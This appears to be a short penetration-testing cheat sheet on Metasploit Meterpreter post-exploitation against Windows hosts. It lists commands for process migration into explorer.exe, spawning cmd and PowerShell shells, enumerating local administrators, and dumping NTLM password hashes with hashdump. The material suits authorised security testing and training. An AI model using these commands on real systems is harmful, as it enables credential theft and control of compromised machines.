Metasploit

Post Exploitation Workflow

getuid
sysinfo
ps -S explorer.exe #Get the process list with filter "explorer.exe"
migrate <pid> #Migrate the session to process
shell #Spawn a cmd.exe process

Check group members

net localgroup adminstrators

Load Powershell Extension

Spawn a powershell.exe in your meterpreter session, just like running shell command to spawn cmd.exe in your session

meterpreter> load powershell
meterpreter> powershell_shell

Dump windows users NTLM hashes

meterpreter> hashdump

PreviousUAC BypassNextPowerShell

Last updated

Was this helpful?